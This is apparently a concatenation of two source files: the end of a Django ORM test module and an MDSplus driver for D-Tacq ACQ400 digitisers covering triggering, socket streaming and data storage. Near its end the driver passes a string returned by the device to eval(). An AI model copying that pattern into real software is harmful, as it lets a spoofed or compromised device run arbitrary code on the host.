        self.assertEqual(Article.objects.get(pk=self.a.id), self.a)

        # pk can be used as a shortcut for the primary key name in any query.
        self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
            ["<Article: Area woman programs in Python>"])

        # Model instances of the same type and same ID are considered equal.
        a = Article.objects.get(pk=self.a.id)
        b = Article.objects.get(pk=self.a.id)
        self.assertEqual(a, b)

    def test_too_many(self):
        # Create a very similar object
        a = Article(
            id=None,
            headline='Area man programs in Python',
            pub_date=datetime(2005, 7, 28),
        )
        a.save()

        self.assertEqual(Article.objects.count(), 2)

        # Django raises an Article.MultipleObjectsReturned exception if the
        # lookup matches more than one object
        six.assertRaisesRegex(
            self,
            MultipleObjectsReturned,
            r"get\(\) returned more than one Article -- it returned 2!",
            Article.objects.get,
            headline__startswith='Area',
        )
        six.assertRaisesRegex(
            self,
            MultipleObjectsReturned,
            r"get\(\) returned more than one Article -- it returned 2!",
            Article.objects.get,
            pub_date__year=2005,
        )
        six.assertRaisesRegex(
            self,
            MultipleObjectsReturned,
            r"get\(\) returned more than one Article -- it returned 2!",
            Article.objects.get,
            pub_date__year=2005,
            pub_date__month=7,
        )
class ConcurrentSaveTests(TransactionTestCase):
    """Cross-connection behavior: saving an object that another connection
    has deleted must fall back to an INSERT."""

    available_apps = ['basic']

    @skipUnlessDBFeature('test_db_allows_multiple_connections')
    def test_concurrent_delete_with_save(self):
        """
        Test fetching, deleting and finally saving an object - we should get
        an insert in this case.
        """
        a = Article.objects.create(headline='foo', pub_date=datetime.now())
        exceptions = []

        def deleter():
            try:
                # Do not delete a directly - doing so alters its state.
                Article.objects.filter(pk=a.pk).delete()
            except Exception as e:
                exceptions.append(e)
            finally:
                # Close this thread's own connection so the test database
                # can be torn down cleanly.
                connections[DEFAULT_DB_ALIAS].close()

        t = threading.Thread(target=deleter)
        t.start()
        t.join()
        # Fix: check *after* the worker finished. The original asserted
        # before the thread was even started, so a failure inside
        # deleter() could never be detected.
        self.assertEqual(len(exceptions), 0)
        # The row was deleted on the other connection; save() must insert.
        a.save()
        self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(TestCase):
    """Guards the exact set of QuerySet methods that get proxied onto
    Manager, so new QuerySet methods are not leaked by accident."""

    # The expected allow-list; compared against what
    # BaseManager._get_queryset_methods actually copies.
    QUERYSET_PROXY_METHODS = [
        'none',
        'count',
        'dates',
        'datetimes',
        'distinct',
        'extra',
        'get',
        'get_or_create',
        'update_or_create',
        'create',
        'bulk_create',
        'filter',
        'aggregate',
        'annotate',
        'complex_filter',
        'exclude',
        'in_bulk',
        'iterator',
        'earliest',
        'latest',
        'first',
        'last',
        'order_by',
        'select_for_update',
        'select_related',
        'prefetch_related',
        'values',
        'values_list',
        'update',
        'reverse',
        'defer',
        'only',
        'using',
        'exists',
        '_insert',
        '_update',
        'raw',
    ]

    def test_manager_methods(self):
        """
        This test ensures that the correct set of methods from `QuerySet`
        are copied onto `Manager`.

        It's particularly useful to prevent accidentally leaking new methods
        into `Manager`. New `QuerySet` methods that should also be copied onto
        `Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
        """
        self.assertEqual(
            sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
            sorted(self.QUERYSET_PROXY_METHODS),
        )
class SelectOnSaveTests(TestCase):
    """Behavior of Meta.select_on_save: an extra SELECT decides between
    UPDATE and INSERT instead of trusting the UPDATE row count."""

    def test_select_on_save(self):
        # Plain model: one UPDATE query per save().
        a1 = Article.objects.create(pub_date=datetime.now())
        with self.assertNumQueries(1):
            a1.save()
        # select_on_save model: SELECT + UPDATE.
        asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
        with self.assertNumQueries(2):
            asos.save()
        # force_update skips the probing SELECT.
        with self.assertNumQueries(1):
            asos.save(force_update=True)
        Article.objects.all().delete()
        # force_update on a deleted row must fail loudly, not insert.
        with self.assertRaises(DatabaseError):
            with self.assertNumQueries(1):
                asos.save(force_update=True)

    def test_select_on_save_lying_update(self):
        """
        Test that select_on_save works correctly if the database
        doesn't return correct information about matched rows from
        UPDATE.
        """
        # Change the manager to not return "row matched" for update().
        # We are going to change the Article's _base_manager class
        # dynamically. This is a bit of a hack, but it seems hard to
        # test this properly otherwise. We patch Article's manager
        # (rather than ArticleSelectOnSave's), because proxy models
        # use their parent model's _base_manager.
        orig_class = Article._base_manager.__class__

        class FakeQuerySet(QuerySet):
            # Make sure the _update method below is in fact called.
            called = False

            def _update(self, *args, **kwargs):
                FakeQuerySet.called = True
                super(FakeQuerySet, self)._update(*args, **kwargs)
                # Lie: report zero rows matched regardless of reality.
                return 0

        class FakeManager(orig_class):
            def get_queryset(self):
                return FakeQuerySet(self.model)

        try:
            Article._base_manager.__class__ = FakeManager
            asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
            # With the probing SELECT, save() still works (3 queries)
            # even though UPDATE claims nothing matched.
            with self.assertNumQueries(3):
                asos.save()
                self.assertTrue(FakeQuerySet.called)
            # This is not wanted behavior, but this is how Django has always
            # behaved for databases that do not return correct information
            # about matched rows for UPDATE.
            with self.assertRaises(DatabaseError):
                asos.save(force_update=True)
            with self.assertRaises(DatabaseError):
                asos.save(update_fields=['pub_date'])
        finally:
            # Always restore the real manager class.
            Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
    """Model.refresh_from_db(): full and partial reloads, foreign key
    cache invalidation, and the zero-query fields=[] case."""

    def _truncate_ms(self, val):
        # MySQL < 5.6.4 removes microseconds from the datetimes which can cause
        # problems when comparing the original value to that loaded from DB
        return val - timedelta(microseconds=val.microsecond)

    def test_refresh(self):
        a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
        Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
        Article.objects.filter(pk=a.pk).update(headline='new headline')
        with self.assertNumQueries(1):
            a.refresh_from_db()
            self.assertEqual(a.headline, 'new headline')

        orig_pub_date = a.pub_date
        new_pub_date = a.pub_date + timedelta(10)
        Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
        # Partial refresh: only 'headline' is reloaded, pub_date stays stale.
        with self.assertNumQueries(1):
            a.refresh_from_db(fields=['headline'])
            self.assertEqual(a.headline, 'new headline 2')
            self.assertEqual(a.pub_date, orig_pub_date)
        with self.assertNumQueries(1):
            a.refresh_from_db()
            self.assertEqual(a.pub_date, new_pub_date)

    def test_refresh_fk(self):
        s1 = SelfRef.objects.create()
        s2 = SelfRef.objects.create()
        s3 = SelfRef.objects.create(selfref=s1)
        s3_copy = SelfRef.objects.get(pk=s3.pk)
        s3_copy.selfref.touched = True
        s3.selfref = s2
        s3.save()
        with self.assertNumQueries(1):
            s3_copy.refresh_from_db()
        with self.assertNumQueries(1):
            # The old related instance was thrown away (the selfref_id has
            # changed). It needs to be reloaded on access, so one query
            # executed.
            self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
            self.assertEqual(s3_copy.selfref, s2)

    def test_refresh_null_fk(self):
        s1 = SelfRef.objects.create()
        s2 = SelfRef.objects.create(selfref=s1)
        # A local, unsaved assignment is discarded by refresh_from_db().
        s2.selfref = None
        s2.refresh_from_db()
        self.assertEqual(s2.selfref, s1)

    def test_refresh_unsaved(self):
        pub_date = self._truncate_ms(datetime.now())
        a = Article.objects.create(pub_date=pub_date)
        # An instance built only from a pk can still be refreshed.
        a2 = Article(id=a.pk)
        with self.assertNumQueries(1):
            a2.refresh_from_db()
        self.assertEqual(a2.pub_date, pub_date)
        self.assertEqual(a2._state.db, "default")

    def test_refresh_fk_on_delete_set_null(self):
        a = Article.objects.create(
            headline='Parrot programs in Python',
            pub_date=datetime(2005, 7, 28),
        )
        s1 = SelfRef.objects.create(article=a)
        # Deleting the target SET NULLs the FK; refresh must pick that up.
        a.delete()
        s1.refresh_from_db()
        self.assertIsNone(s1.article_id)
        self.assertIsNone(s1.article)

    def test_refresh_no_fields(self):
        a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
        # refresh_from_db() with an empty field list must be a no-op query-wise.
        with self.assertNumQueries(0):
            a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(TestCase):
    def test_field_related_deprecation(self):
        """Accessing ``field.related`` warns exactly once and still yields
        a ForeignObjectRel instance."""
        field = SelfRef._meta.get_field('selfref')
        with warnings.catch_warnings(record=True) as caught:
            # Record every warning, even ones already seen in this process.
            warnings.simplefilter('always')
            self.assertIsInstance(field.related, ForeignObjectRel)
            self.assertEqual(len(caught), 1)
            message = str(caught.pop().message)
            self.assertEqual(
                message,
                'Usage of field.related has been deprecated. Use field.rel instead.'
            )
|
acq400_base.py | #
# Copyright (c) 2017, Massachusetts Institute of Technology All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import MDSplus
import threading
try:
    # Python 2 module name; fall back to the Python 3 name below.
    from Queue import Queue, Empty
except ImportError:
    from queue import Queue, Empty
import socket
import time
import inspect
import os
import logging

# Prefer a package-relative import of the HAPI bindings; fall back to an
# absolute import when this module is loaded as a plain script.
# (Python 2 raises ValueError for a bad relative level, Python 3 ImportError.)
try:
    acq400_hapi = __import__('acq400_hapi', globals(), level=1)
except (ImportError, ValueError):
    acq400_hapi = __import__('acq400_hapi', globals())
print("pgmwashere {} {} HAPI {}".format("acq400_base", __file__, acq400_hapi.__file__))
class _ACQ400_BASE(MDSplus.Device):
    """
    D-Tacq ACQ400 Base parts and methods.
    All other carrier/function combinations use this class as a parent class.
    """
    # Tree nodes common to every ACQ400-based device.
    base_parts=[
        # The user will need to change the hostname to the relevant hostname/IP.
        {'path':':NODE','type':'text','value':'acq2106_999', 'options':('no_write_shot',)},
        {'path':':SITE','type':'numeric', 'value': 1, 'options':('no_write_shot',)},
        {'path':':TRIG_MODE','type':'text', 'value': 'role_default', 'options':('no_write_shot',)},
        {'path':':ROLE','type':'text', 'value': 'fpmaster', 'options':('no_write_shot',)},
        {'path':':FREQ','type':'numeric', 'value': int(1e6), 'options':('no_write_shot',)},
        {'path':':TOFF','type':'numeric', 'value': int(0), 'options':('no_write_shot',)},
        {'path':':SAMPLES','type':'numeric', 'value': int(1e5), 'options':('no_write_shot',)},
        {'path':':INIT_ACTION', 'type':'action', 'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',50,None),Method(None,'INIT',head))",'options':('no_write_shot',)},
        {'path':':ARM_ACTION', 'type':'action', 'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',51,None),Method(None,'ARM',head))",'options':('no_write_shot',)},
        {'path':':STORE_ACTION', 'type':'action', 'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',52,None),Method(None,'STORE',head))",'options':('no_write_shot',)},
    ]

    # Recognised TRIG_MODE values (besides the 'role_default' pass-through).
    trig_types=[ 'hard', 'soft', 'automatic']

    def setChanScale(self, num):
        """Look up the INPUT node for channel `num` (debug placeholder only)."""
        chan = self.__getattr__('INPUT_%3.3d' % num)
        print("pgmwashere. BOGUS alert. computed but going nowhere:{}".format(chan))

    def init(self):
        """Configure the UUT's sync role, trigger source and post samples.

        Reads NODE, TRIG_MODE, ROLE, FREQ and SAMPLES from the tree and
        pushes the corresponding settings to the device via acq400_hapi.
        """
        uut = acq400_hapi.Acq400(self.node.data(), monitor=False)
        trg = self.trig_mode.data()
        # Map the symbolic trigger mode onto the TRG:DX line index.
        # BUG FIX: default trg_dx first, so an unrecognised TRIG_MODE value
        # can no longer raise NameError when building sync_role below.
        trg_dx = 0
        if trg == 'hard':
            trg_dx = 0
        elif trg == 'automatic':
            trg_dx = 1
        elif trg == 'soft':
            trg_dx = 1

        # The default case is to use the trigger set by sync_role.
        if trg == 'role_default':
            uut.s0.sync_role = "{} {}".format(self.role.data(), self.freq.data())
        else:
            # If the user has specified a trigger.
            uut.s0.sync_role = '{} {} TRG:DX={}'.format(self.role.data(), self.freq.data(), trg_dx)

        # Now we set the trigger to be soft when desired.
        if trg == 'soft':
            uut.s0.transient = 'SOFT_TRIGGER=0'
        if trg == 'automatic':
            uut.s0.transient = 'SOFT_TRIGGER=1'

        uut.s0.transient = "POST={}".format(self.samples.data())
    INIT = init
class _ACQ400_ST_BASE(_ACQ400_BASE):
    """
    A sub-class of _ACQ400_BASE that includes classes for streaming data
    and the extra nodes for streaming devices.
    """
    # Extra tree nodes needed only by streaming devices.
    st_base_parts = [
        {'path':':RUNNING', 'type':'numeric', 'options':('no_write_model',)},
        {'path':':SEG_LENGTH', 'type':'numeric', 'value': 8000, 'options':('no_write_shot',)},
        {'path':':MAX_SEGMENTS','type':'numeric', 'value': 1000, 'options':('no_write_shot',)},
        {'path':':SEG_EVENT', 'type':'text', 'value': 'STREAM','options':('no_write_shot',)},
        {'path':':TRIG_TIME', 'type':'numeric', 'options':('write_shot',)}
    ]

    def arm(self):
        """Mark the device as running and start the MDSWorker consumer thread."""
        self.running.on=True
        thread = self.MDSWorker(self)
        thread.start()
    ARM=arm

    def stop(self):
        """Clear RUNNING; the MDSWorker main loop exits on its next check."""
        self.running.on = False
    STOP = stop

    class MDSWorker(threading.Thread):
        """Consumes filled data buffers and writes them as MDSplus segments."""
        NUM_BUFFERS = 20

        def __init__(self,dev):
            # NOTE(review): the thread is initialised twice here (super() and
            # an explicit Thread.__init__); the second call looks redundant
            # and discards the name= set by the first -- confirm.
            super(_ACQ400_ST_BASE.MDSWorker,self).__init__(name=dev.path)
            threading.Thread.__init__(self)
            self.dev = dev.copy()

            self.chans = []
            self.decim = []
            # self.nchans = self.dev.sites*32
            uut = acq400_hapi.Acq400(self.dev.node.data())
            self.nchans = uut.nchan()

            # Cache each channel node and its per-channel decimation factor.
            for i in range(self.nchans):
                self.chans.append(getattr(self.dev, 'INPUT_%3.3d'%(i+1)))
                self.decim.append(getattr(self.dev, 'INPUT_%3.3d:DECIMATE' %(i+1)).data())
            self.seg_length = self.dev.seg_length.data()
            # Raw segment size in bytes: samples * channels * sizeof(int16).
            self.segment_bytes = self.seg_length*self.nchans*np.int16(0).nbytes

            # Buffer recycling between this thread and the DeviceWorker.
            self.empty_buffers = Queue()
            self.full_buffers = Queue()

            for i in range(self.NUM_BUFFERS):
                self.empty_buffers.put(bytearray(self.segment_bytes))

            self.device_thread = self.DeviceWorker(self)

        def run(self):
            def lcm(a,b):
                # NOTE(review): fractions.gcd was removed in Python 3.9
                # (deprecated since 3.5; use math.gcd there) -- this import
                # only works on older interpreters.
                from fractions import gcd
                return (a * b / gcd(int(a), int(b)))

            def lcma(arr):
                # Least common multiple of a list of values.
                ans = 1.
                for e in arr:
                    ans = lcm(ans, e)
                return int(ans)

            if self.dev.debug:
                print("MDSWorker running")

            event_name = self.dev.seg_event.data()
            dt = 1./self.dev.freq.data()

            # Round the segment length up to a multiple of the LCM of all
            # channel decimations so every channel divides evenly.
            decimator = lcma(self.decim)
            if self.seg_length % decimator:
                self.seg_length = (self.seg_length // decimator + 1) * decimator

            self.device_thread.start()

            segment = 0
            running = self.dev.running
            max_segments = self.dev.max_segments.data()
            while running.on and segment < max_segments:
                try:
                    buf = self.full_buffers.get(block=True, timeout=1)
                except Empty:
                    # No data yet; re-check RUNNING and wait again.
                    continue

                buffer = np.frombuffer(buf, dtype='int16')
                i = 0
                for c in self.chans:
                    # Per-channel sample count and time step after decimation.
                    slength = self.seg_length/self.decim[i]
                    deltat = dt * self.decim[i]
                    if c.on:
                        # De-interleave this channel's samples from the buffer.
                        b = buffer[i::self.nchans*self.decim[i]]
                        begin = segment * slength * deltat
                        end = begin + (slength - 1) * deltat
                        dim = MDSplus.Range(begin, end, deltat)
                        c.makeSegment(begin, end, dim, b)
                    i += 1
                segment += 1
                MDSplus.Event.setevent(event_name)
                # Recycle the buffer for the DeviceWorker.
                self.empty_buffers.put(buf)

            # Back-date TRIG_TIME by the duration of the first recv_into chunk.
            self.dev.trig_time.record = self.device_thread.trig_time - ((self.device_thread.io_buffer_size / np.int16(0).nbytes) * dt)
            self.device_thread.stop()

        class DeviceWorker(threading.Thread):
            """Pulls raw sample bytes from the UUT's streaming port (4210)."""
            running = False

            def __init__(self,mds):
                threading.Thread.__init__(self)
                self.debug = mds.dev.debug
                self.node_addr = mds.dev.node.data()
                self.seg_length = mds.dev.seg_length.data()
                self.segment_bytes = mds.segment_bytes
                self.freq = mds.dev.freq.data()
                self.nchans = mds.nchans
                self.empty_buffers = mds.empty_buffers
                self.full_buffers = mds.full_buffers
                # Wall-clock time of the first received chunk (set in run()).
                self.trig_time = 0
                self.io_buffer_size = 4096

            def stop(self):
                """Ask the acquisition loop to exit after the current buffer."""
                self.running = False

            def run(self):
                if self.debug:
                    print("DeviceWorker running")
                self.running = True
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((self.node_addr,4210))
                s.settimeout(6)

                # trigger time out count initialization:
                first = True

                while self.running:
                    # Reuse a recycled buffer when available, else allocate.
                    try:
                        buf = self.empty_buffers.get(block=False)
                    except Empty:
                        buf = bytearray(self.segment_bytes)

                    toread =self.segment_bytes
                    try:
                        view = memoryview(buf)
                        while toread:
                            nbytes = s.recv_into(view, min(self.io_buffer_size,toread))
                            if first:
                                # Approximate trigger time: first data arrival.
                                self.trig_time = time.time()
                                first = False
                            view = view[nbytes:] # slicing views is cheap
                            toread -= nbytes
                    except socket.timeout as e:
                        print("Got a timeout.")
                        err = e.args[0]
                        # this next if/else is a bit redundant, but illustrates how the
                        # timeout exception is setup
                        if err == 'timed out':
                            time.sleep(1)
                            print (' recv timed out, retry later')
                            continue
                        else:
                            print (e)
                            break
                    except socket.error as e:
                        # Something else happened, handle error, exit, etc.
                        print("socket error", e)
                        # Hand over the partial buffer before bailing out.
                        self.full_buffers.put(buf[:self.segment_bytes-toread])
                        break
                    else:
                        if toread != 0:
                            # recv_into returned 0 bytes: peer closed cleanly.
                            print ('orderly shutdown on server end')
                            break
                        else:
                            self.full_buffers.put(buf)
class _ACQ400_TR_BASE(_ACQ400_BASE):
    """
    A child class of _ACQ400_BASE that contains the specific methods for
    taking a transient capture.
    """
    def _arm(self):
        """Blocking worker: run one complete shot on the UUT."""
        uut = acq400_hapi.Acq400(self.node.data())
        shot_controller = acq400_hapi.ShotController([uut])
        shot_controller.run_shot()
        return None

    def arm(self):
        """Non-blocking ARM: run the shot on a background thread."""
        thread = threading.Thread(target = self._arm)
        thread.start()
    ARM=arm

    def store(self):
        """Non-blocking STORE for use with the dispatcher."""
        thread = threading.Thread(target = self._store)
        thread.start()
        return None
    STORE=store

    def _store(self):
        """Blocking worker: wait for IDLE, then read back, calibrate and
        store every enabled input channel."""
        uut = acq400_hapi.Acq400(self.node.data())
        # Busy-wait until the capture state machine returns to IDLE (0).
        while uut.statmon.get_state() != 0: continue
        self.chans = []
        nchans = uut.nchan()
        for ii in range(nchans):
            self.chans.append(getattr(self, 'INPUT_%3.3d'%(ii+1)))
        # Per-channel calibration: slope (eslo) / offset (eoff); element 0
        # of the calibration arrays is skipped.
        uut.fetch_all_calibration()
        eslo = uut.cal_eslo[1:]
        eoff = uut.cal_eoff[1:]
        channel_data = uut.read_channels()

        # Sample period from the FREQ node; same time base for all channels.
        DT=1/float(self.FREQ.data())
        nsam = len(channel_data[0])
        print("self.FREQ.data() nsam:{} {} DT {}".format(nsam, self.FREQ.data(), DT))
        axis = MDSplus.Data.compile('BUILD_WITH_UNITS(BUILD_RANGE($1, $2, $3), "s")', self.TOFF.data(), nsam*DT, DT)
        for ic, ch in enumerate(self.chans):
            if ch.on:
                ch.RAW.putData(channel_data[ic]) # store raw for easy access
                ch.EOFF.putData(float(eoff[ic]))
                ch.ESLO.putData(float(eslo[ic]))
                ch.CAL.putData(MDSplus.Data.compile('BUILD_WITH_UNITS($3*$1+$2, "V")', ch.ESLO, ch.EOFF, ch.RAW)) # does this make a COPY of ch.RAW?
                # from mdsPutCh, recipe by B.Blackwell C(2007)
                win = MDSplus.Data.compile('BUILD_WINDOW(0, $1, BUILD_WITH_UNITS(0, "s"))', nsam)
                ch.TB.putData(MDSplus.Dimension(win, axis))
                ch.CAL_INPUT.putData(MDSplus.Data.compile('BUILD_SIGNAL($1, $2, $3)', ch.CAL, ch.RAW, ch.TB))
                ch.putData(ch.CAL_INPUT)
        return None

    def storeb(self):
        ''' storeb: blocking store for use direct from TCL> '''
        # NOTE(review): unlike store(), this runs _store() synchronously;
        # the original docstring claimed "non-blocking".
        return self._store()
    STOREB=storeb
    pass
class _ACQ400_MR_BASE(_ACQ400_TR_BASE):
    """
    A sub-class of _ACQ400_TR_BASE that includes functions for MR
    (multi-rate) data and the extra nodes for MR processing.
    """
    # Extra tree nodes needed only for multi-rate processing.
    mr_base_parts = [
        {'path':':DT', 'type':'numeric','options':('write_shot',)},
        {'path':':TB_NS', 'type':'signal', 'options':('no_write_model','write_once',)},
        {'path':':DECIMS', 'type':'signal','options':('no_write_model','write_once',)},
        {'path':':Fclk', 'type':'numeric','value':40000000,'options':('write_shot',)},
        {'path':':trg0_src', 'type':'text', 'value':'EXT','options':('write_model',)},
        {'path':':evsel0', 'type':'numeric','value':4,'options':('write_model',)},
        {'path':':MR10DEC', 'type':'numeric','value':32,'options':('write_model',)},
        {'path':':STL', 'type':'text', 'options':('write_model',)}
    ]

    def _create_time_base(self, decims, dt):
        """Accumulate per-sample decimation factors into absolute sample times.

        decims -- array of decimation factors, one per sample
        dt     -- base clock period (same unit as the returned times)
        """
        tb = np.zeros(decims.shape[-1])
        ttime = 0
        for ix, dec in enumerate(decims):
            tb[ix] = ttime
            ttime += float(dec) * dt
        return tb

    def create_time_base(self, uut):
        """Store DECIMS, DT and the derived non-uniform time base TB_NS."""
        decims = uut.read_decims()
        try:
            # Clock period in ns, derived from the measured MB clock
            # frequency (rounded to the nearest 10 kHz).
            dt = 1 / ((round(float(uut.s0.SIG_CLK_MB_FREQ.split(" ")[1]), -4)) * 1e-9)
        except Exception:
            # Fall back to 25 ns (40 MHz) when the knob cannot be parsed.
            dt = 25

        tb_ns = self._create_time_base(decims, dt)
        self.DECIMS.putData(decims)
        self.DT.putData(dt)
        self.TB_NS.putData(tb_ns)

    def store(self):
        """Read back, calibrate and store all enabled channels, then the MR time base."""
        uut = acq400_hapi.Acq400(self.node.data())
        self.chans = []
        nchans = uut.nchan()
        for ii in range(nchans):
            self.chans.append(getattr(self, 'INPUT_%3.3d'%(ii+1)))
        # Per-channel calibration slope/offset; element 0 is skipped.
        uut.fetch_all_calibration()
        eslo = uut.cal_eslo[1:]
        eoff = uut.cal_eoff[1:]
        channel_data = uut.read_channels()
        for ic, ch in enumerate(self.chans):
            if ch.on:
                ch.putData(channel_data[ic])
                ch.EOFF.putData(float(eoff[ic]))
                ch.ESLO.putData(float(eslo[ic]))
                # Calibrated signal expression referencing the raw node.
                expr = "{} * {} + {}".format(ch, ch.ESLO, ch.EOFF)
                ch.CAL_INPUT.putData(MDSplus.Data.compile(expr))
        self.create_time_base(uut)
    STORE=store

    def arm(self):
        """Customised ARM for the acq2106 MR setup.

        BUG FIX: the original signature was ``def arm():`` — missing
        ``self`` — so dispatching ARM raised immediately (the body uses
        self.node / self.trg0_src).
        """
        uut = acq400_hapi.Acq400(self.node.data())
        shot_controller = acq400_hapi.ShotController([uut])
        shot_controller.run_shot(remote_trigger=self.selects_trg_src(uut, self.trg0_src.data()))
        return None
    ARM = arm

    def selects_trg_src(self, uut, src):
        """Return a thunk that routes the UUT's TRG_0 signal to `src`."""
        def select_trg_src():
            uut.s0.SIG_SRC_TRG_0 = src
        return select_trg_src

    def denormalise_stl(self, stl):
        """Convert human-readable STL (delays in microseconds) to clock ticks.

        Delays are scaled by a 40 MHz clock (hard-coded; the Fclk node
        exists but is intentionally not read here — see the commented
        line), aligned down to a multiple of MR10DEC, and the state is
        shifted up to the evsel0 event-select bit.
        """
        lines = stl.splitlines()
        stl_literal_lines = []
        for line in lines:
            # Skip comments and blank/too-short lines.
            if line.startswith('#') or len(line) < 2:
                continue
            else:
                action = line.split('#')[0]
                if action.startswith('+'): # support relative increments
                    delayp = '+'
                    action = action[1:]
                else:
                    delayp = ''
                delay, state = [int(x) for x in action.split(',')]
                # delayk = int(delay * self.Fclk.data() / 1000000)
                delayk = int(delay * 40000000 / 1000000)
                # Align down to a whole MR10DEC decimation block.
                delaym = delayk - delayk % self.MR10DEC.data()
                state = state << self.evsel0.data()
                elem = "{}{:d},{:02x}".format(delayp, delaym, state)
                stl_literal_lines.append(elem)
        return "\n".join(stl_literal_lines)

    def init(self):
        """Load the (denormalised) STL into the GPG and configure MR mode."""
        uut = acq400_hapi.Acq2106(self.node.data())
        # NOTE(review): the STL path is hard-coded here, overwriting whatever
        # was previously stored in the STL node — confirm this is intended.
        self.STL.putData("/home/dt100/PROJECTS/acq400_hapi/user_apps/STL/acq2106_test10.stl")
        with open(self.STL.data(), 'r') as fp:
            stl = fp.read()
        lit_stl = self.denormalise_stl(stl)

        # Park the trigger source while (re)programming the GPG.
        uut.s0.SIG_SRC_TRG_0 = 'NONE'
        uut.s0.gpg_trg = '1,0,1'
        uut.s0.gpg_clk = '1,1,1'
        uut.s0.GPG_ENABLE = '0'
        uut.load_gpg(lit_stl, 2) # TODO: Change to MDSplus debug.
        uut.set_MR(True, evsel0=self.evsel0.data(), evsel1=self.evsel0.data()+1, MR10DEC=self.MR10DEC.data())
        # Route both event-select lines to the GPG, then re-enable it.
        uut.s0.set_knob('SIG_EVENT_SRC_{}'.format(self.evsel0.data()), 'GPG')
        uut.s0.set_knob('SIG_EVENT_SRC_{}'.format(self.evsel0.data()+1), 'GPG')
        uut.s0.GPG_ENABLE = '1'
    INIT = init
    pass
class _ACQ400_M8_BASE(_ACQ400_BASE):
    """
    A child class of _ACQ400_BASE that contains the specific methods for
    taking a transient capture from MGTDRAM8.
    """
    def _arm(self):
        """Placeholder: MGTDRAM arming is not implemented yet."""
        uut = acq400_hapi.Acq400(self.node.data())
        print("WORKTODO")
        return None

    def arm(self):
        """Non-blocking ARM: runs _arm on a background thread."""
        thread = threading.Thread(target = self._arm)
        thread.start()
    ARM=arm

    def _store(self):
        """Blocking worker: pull captured data from MGTDRAM and store it."""
        uutname = self.node.data()
        # Dedicated per-UUT log file for the (long-running) MGT pull.
        logging.basicConfig(filename="{}_M8.log".format(uutname),
                            format='%(asctime)s %(levelname)-8s %(message)s',
                            datefmt='%Y-%m-%d %H:%M:%S',
                            level=logging.DEBUG)
        logging.debug("{}.{}".format("_ACQ400_M8_BASE", "store"))
        uut = acq400_hapi.factory(uutname)
        # Busy-wait until the capture state machine returns to IDLE (0).
        while uut.statmon.get_state() != 0:
            continue
        rc = uut.create_mgtdram_pull_client()
        # Number of buffers the capture pushed into MGTDRAM.
        push_buffers = acq400_hapi.Acq400.intpv(uut.cA.SIG_MGT_PUSH_BUFS_COUNT)
        uut.cA.SIG_MGT_PULL_BUFS_RESET = '1'
        self.chans = []
        nchans = uut.nchan()
        for ii in range(nchans):
            self.chans.append(getattr(self, 'INPUT_%3.3d'%(ii+1)))
        # Per-channel calibration slope/offset; element 0 is skipped.
        uut.fetch_all_calibration()
        eslo = uut.cal_eslo[1:]
        eoff = uut.cal_eoff[1:]

        # Accumulate all pulled blocks into one flat, sample-interleaved array.
        M8_mirror = None
        nbytes = push_buffers*acq400_hapi.Acq2106_Mgtdram8.MGT_BLOCK_BYTES
        logging.debug("call get_blocks {}".format(nbytes))
        for buffer in rc.get_blocks(nbytes, data_size=uut.data_size()):
            if buffer is None or len(buffer) == 0:
                print("Buffer len 0 quit")
                break
            if M8_mirror is None:
                M8_mirror = buffer
            else:
                logging.debug("concat M8_mirror len:{}, buffer:{} ".format(len(M8_mirror), len(buffer)))
                M8_mirror = np.concatenate((M8_mirror, buffer), axis=0)
        logging.debug("M8_mirror len:{} * {}".format(len(M8_mirror), M8_mirror.dtype))
        channel_data = M8_mirror
        logging.debug("channel_data len:{} * {}".format(len(channel_data), channel_data.dtype))
        logging.debug("samples per channel {}".format(len(channel_data)/nchans))

        DT=1/float(self.FREQ.data())
        # NOTE(review): on Python 3 this is float division; confirm nsam is
        # intended to be an exact integer sample count.
        nsam = len(channel_data)/nchans
        logging.debug("self.FREQ.data() nsam:{} {} DT {}".format(nsam, self.FREQ.data(), DT))
        # Channel mapping: index of each logical channel within the
        # interleaved MGTDRAM stream.
        _cmap = uut.s0.sr("channel_mapping=mgtdram")
        cmap = eval('('+_cmap+')')
        if len(cmap) < nchans:
            logging.error("channel map length {} < nchans {}". format(len(cmap), nchans))
